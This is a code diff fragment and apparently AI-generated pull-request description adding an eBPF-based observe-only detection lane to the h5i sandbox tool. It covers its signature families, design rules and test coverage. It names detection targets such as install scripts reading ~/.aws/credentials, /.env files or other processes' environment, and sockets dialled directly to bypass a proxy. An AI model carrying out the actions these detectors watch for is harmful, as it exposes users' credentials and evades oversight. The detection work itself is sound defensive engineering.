+            title={`${rt.events_seen ?? 0} kernel event(s), no signature fired${partial}${lost}`}
+          >
+            ✓
+          </span>
+        );
+      const detail = dets
+        .map((d) => `[${d.severity}] ${d.rule} ×${d.count} — ${d.title}`)
+        .join("\n");
+      return (
+        <span
+          className={alerts.length ? "sbx-verdict critical" : "sbx-verdict warning"}
+          title={`${detail}${partial}${lost}`}
+        >
+          {alerts.length ? "⛔" : "⚠"} {dets.length}
+        </span>
+      );
+    }
   }
 }
 
@@ -1354,6 +1444,11 @@ function laneAllowance(lane: LaneKey, p: EnforcedPolicy | null): string {
       return `wall ${p.wall_secs}s`;
     case "browser":
       return "in box";
+    case "kernel":
+      // The lane header says what the *policy* allows in every other column.
+      // There is nothing to allow here: the collector grants nothing and
+      // denies nothing, so the honest header is what it does.
+      return "observe only";
   }
 }
 

--- a/web/src/api.ts
+++ b/web/src/api.ts
@@ -105,6 +105,47 @@ export function thirdPartyCanRead(share: ShareEvidence): boolean {
   return share.transport !== "p2p";
 }
 
+/**
+ * One rule that fired, folded across every event that matched it —
+ * `h5i_bpf::Detection`.
+ */
+export interface Detection {
+  rule: string;
+  family: string;
+  severity: "info" | "notice" | "alert";
+  title: string;
+  count: number;
+  first_ns: number;
+  last_ns: number;
+  examples?: string[];
+  examples_truncated?: boolean;
+}
+
+/**
+ * What the kernel-observed lane saw — `h5i_bpf::RuntimeEvidence`.
+ *
+ * The one thing a renderer must never do with this is treat an empty
+ * `detections` list as a clean run. It is only clean if the run was watched,
+ * which is `unavailable == null && coverage !== "none"`; anything else means
+ * nobody looked. {@link runtimeObserved} is that test, in one place.
+ */
+export interface RuntimeEvidence {
+  lane: string;
+  scope: string;
+  coverage: "full" | "partial" | "none";
+  coverage_reason?: string;
+  events_seen?: number;
+  events_lost?: number;
+  events_filtered?: number;
+  detections?: Detection[];
+  unavailable?: string;
+}
+
+/** Was this run actually watched? Mirrors `RuntimeEvidence::observed`. */
+export function runtimeObserved(rt: RuntimeEvidence): boolean {
+  return !rt.unavailable && rt.coverage !== "none";
+}
+
 /** One observed execution — `h5i_core::receipt::ExecRecord`. */
 export interface ExecRecord {
   id: string;
@@ -129,6 +170,8 @@ export interface ExecRecord {
   egress?: EgressSummary;
   browser?: BrowserEvidence;
   share?: ShareEvidence;
+  /** What an eBPF collector saw from the kernel, when one was watching. */
+  runtime?: RuntimeEvidence;
   redactions?: string[];
   raw_oid: string;
   raw_size: number;
@@ -153,6 +196,18 @@ export interface Signals {
   verdict: Verdict;
   weak_isolation: boolean;
   box_claimed_only: boolean;
+  /** Runs an eBPF collector actually watched. */
+  kernel_watched?: number;
+  /** Runs that carry a runtime block which observed nothing, and why. */
+  kernel_unwatched?: number;
+  /** `alert`-severity matches, summed over watched runs. */
+  kernel_alerts?: number;
+  /** `notice`-severity matches. */
+  kernel_notices?: number;
+  /** Events dropped before anything could examine them. */
+  kernel_events_lost?: number;
+  /** Distinct rule ids that fired, capped. */
+  kernel_rules?: string[];
   /** Ended share sessions on this log. Never folded into the verdict. */
   shares: number;
   /** Of those, the ones a third party could read. */


### PR DESCRIPTION
Adds a fifth evidence lane to h5i: an eBPF collector that watches a run from
the kernel and files what it saw in that run's receipt.

Design, the alternatives that were refused, and the limits are **ROADMAP.md
sections D1 to D14** (a new part, plus an `M18` milestone stub).

## Why

Every lane h5i had sits either at the *boundary* of a box (h5i as the parent
process, the CONNECT proxy, the runner's authenticated channel) or *inside*
it (the tee shim, the browser). That is one shape repeated four times, and it
is defeated by the same two things every time: work that happens below the
outermost command, and a box that declines to cooperate.

| lane | sees | defeated by |
|---|---|---|
| `host-env-run` | argv, exit, rusage | only ever the *outermost* command |
| `tee-shim` | interactive shell commands | any child that does its own work |
| `shell-egress` | HTTP(S) routed through the proxy | a socket dialled directly |
| `browser` | console, page errors | closing the browser |

Between them sits everything an agent's build actually does: the four hundred
processes `npm ci` forks, the `postinstall` that reads `~/.aws/credentials`
because the profile granted the directory, the test that dials a hardcoded IP
because `net.mode` is proxy and the proxy only ever sees names.

The kernel sees every `execve` whether or not a shim wrapped it, every
`connect` whether or not it spoke HTTP, and every `openat` whether or not the
opener wanted to be seen. This is the first lane that is neither at the
boundary nor inside the box.

## What it is

`crates/h5i-bpf`: 17 syscall and scheduler tracepoints into one ring buffer, a
signature engine over the decoded events, and the receipt types both produce.

**No CO-RE, no `vmlinux.h`, no BTF, no kernel headers.** The probe reads no
kernel structure. It reads syscall tracepoint arguments, which are stable ABI,
so one object loads on any kernel from 5.8 up. `bpf/h5i_detect.bpf.c`
`#include`s nothing at all; the ~20 constants and prototypes it needs are
vendored in `bpf/h5i_bpf.h`. The build requirement is `clang -target bpf` and
nothing else.

**It cannot deny anything, by construction.** There is no `bpf_send_signal`,
no `bpf_override_return` and no LSM program anywhere in the file. Denial in
h5i belongs to Landlock, seccomp, the netns and the egress proxy. A second
thing that sometimes blocks would blur a boundary that is currently sharp.

**Scope is a kernel-maintained process tree**, seeded from h5i's own tasks.
Seeding that way leaves two holes, and the probe's state machine closes both.
h5i's *threads* are told from its *children* by whether the new task leads its
own thread group. And h5i's own `pre_exec` work, which applies Landlock and
opens the ruleset paths, is held back until the payload's `execve`, so h5i's
confinement machinery is never reported as the box's behaviour.

**17 signatures** in five families, as a data table `h5i box detect rules`
prints. `net.direct-egress` is the one that covers a gap nothing else can: the
CONNECT proxy structurally cannot see a socket dialled at a literal address,
and on the workspace tier there is no netns to force the issue either.

## The design rule throughout

**An absence never renders as a clean result.**

- No `runtime` block means the profile did not ask to be watched.
- A block with `unavailable` means it asked and the probe could not attach.
  The block is written anyway, carrying the reason, because a missing block
  and a quiet box would otherwise be indistinguishable.
- `coverage: partial|none` and `events_lost` are carried as facts, each with a
  reason, so "we looked and found nothing" and "we could not look" stay apart.
- Kernel alerts raise the console's `attention` and never its `denial`. This
  lane refuses nothing, and `denial` is the one word on that screen that
  currently has a precise meaning.

## Opt-in at three layers

| layer | switch | default |
|---|---|---|
| build | `cargo install --path . --features bpf` | off; stock and released binaries carry no probe |
| host | `CAP_BPF` + `CAP_PERFMON` | not granted. h5i prints the `setcap` and never runs it |
| policy | `[profile.X.detect] enabled = true` | false |

The evidence *types* are deliberately not optional. `h5i-core` depends on
`h5i-bpf` unconditionally with `default-features = false`, so a build with no
collector still reads a receipt written by one that had it. A feature flag
that changed a serialized record's shape would make yesterday's evidence
unreadable after an upgrade.

The second commit fixes a real hole in that. `h5i-bpf` originally had
`default = ["load"]`, so the main clippy job would lint the loader, and
Cargo's workspace feature unification meant `cargo build --workspace` pulled
aya for every contributor while `cargo install` did not. Verified closed with
`cargo tree -i aya`.

## Surfaces

`[profile.X.detect]` (in the policy digest, appended last and skipped when
default, so no existing digest moves) · the receipt's `runtime` block · the
export report's "What the kernel saw" · `h5i box detect {probe,rules,show}` ·
a `KERN` lane and callouts in the console · `box status` / `probe` /
`capabilities` · MANUAL, SECURITY, README, regenerated man + manual · a CI job.

## Testing, and the one thing not tested

Green: clippy in four configurations, 80 unit tests in the crate, 12
end-to-end tests driving the real binary. The signature engine is tested
against synthetic event streams, with a table-driven test that fails if a rule
is listed in the catalogue and unreachable from `observe`. Both directions of
each judgement call are covered: a LAN address *is* egress, loopback is not,
the proxy's own endpoint is not, a granted `unix_sockets` profile is not
reported for using them, and a box reading *its own* `/proc/<pid>/environ` is
not reported. The wire contract is held from both ends by a compile-time size
assertion, a magic-and-version check per record, a test that parses the C
header and compares every constant against the Rust enum, and a test that
parses the probe source and fails if it declares a program the attach table
does not name.

**The attach itself is not tested.** Loading a program and binding it to a
tracepoint needs `CAP_BPF` and `CAP_PERFMON`, which no CI runner grants and
which `cargo test` should not acquire. That path is
`crates/h5i-bpf/tests/live_attach.rs` behind `H5I_BPF_LIVE=1`, and it prints
its reason and skips rather than passing quietly. Until it runs somewhere
privileged, the claim is: the probe compiles, the loader is written against a
pinned aya, the verifier has not seen it.

Two things that first privileged run is checking, stated in ROADMAP D14.6 so a
failure is diagnosable rather than surprising:

1. the verifier's opinion of the `openat` program, roughly 10k instructions
   once the prefix loop and `/.env` scan unroll. Well inside the 1M limit, and
   the largest unverified thing here.
2. the tracepoint field offsets, which the loader checks against
   `/sys/kernel/tracing/events/.../format` when readable, and otherwise skips
   visibly (`detect probe` reports `tracefs = no`).

```bash
sudo -E env "PATH=$PATH" H5I_BPF_LIVE=1 \
    cargo test -p h5i-bpf --features load --test live_attach -- --nocapture
```

Pre-existing failures on this branch, unrelated and reproduced on a clean
tree: 3 in `env_integration` (process-tier worktree-stat host drift) and 3 in
`h5i-sandbox`'s `microvm` marker tests.

## Read against

`tracee` for the events-and-signatures split, and for counting dropped events
rather than smoothing them over. `tetragon` for process lineage kept in the
kernel rather than reconstructed by racing `/proc`. `aya` for the loader.
What each one contributed and what was refused is D3.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
